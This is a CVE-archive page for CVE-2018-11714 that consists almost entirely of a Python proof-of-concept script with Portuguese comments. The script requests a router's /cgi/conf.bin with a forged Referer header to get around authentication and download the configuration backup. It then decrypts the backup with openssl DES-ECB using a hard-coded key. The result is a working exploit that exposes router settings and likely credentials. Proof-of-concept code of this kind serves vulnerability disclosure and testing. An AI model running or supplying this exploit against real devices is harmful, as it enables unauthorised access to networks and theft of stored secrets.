4837 Total CVEs
26 Years
GitHub
Home / 2018 / CVE-2018-11714
README.md
Rendering markdown...
POC / poc.py PY
⬇ Raw GitHub ✕ Close 
import requests, subprocess
router_ip = "192.168.3.26"
url = f"http://{router_ip}/cgi/conf.bin"
headers = {
    "Referer": f"http://{router_ip}/mainFrame.htm"
}

response = requests.get(url, headers=headers)

if response.status_code == 200:
    with open("conf.bin", "wb") as f:
        f.write(response.content)
    print(":: Arquivo conf.bin salvo com sucesso!")

else:
    print(f"?? Erro ao baixar: {response.status_code}")

print(":: Descrypting...")

with open("conf.bin", "rb") as f:
    f.seek(144) # avancamos os 144 bytes
    rest = f.read() # armazenamos em rest

with open("config_enc.bin", "wb") as f:
    f.write(rest) # e salvamos ele

subprocess.run([
    "openssl", "enc", "-d", "-des-ecb", # o tipo da criptografia DES-ECB
    "-nopad",
    "-K", "478DA50BF9E3D2CF", # passamos nossa chave hex
    "-in", "config_enc.bin", "-out", "result.bin" # e salvamos em result.bin
])

print(":: salvo em result.bin!")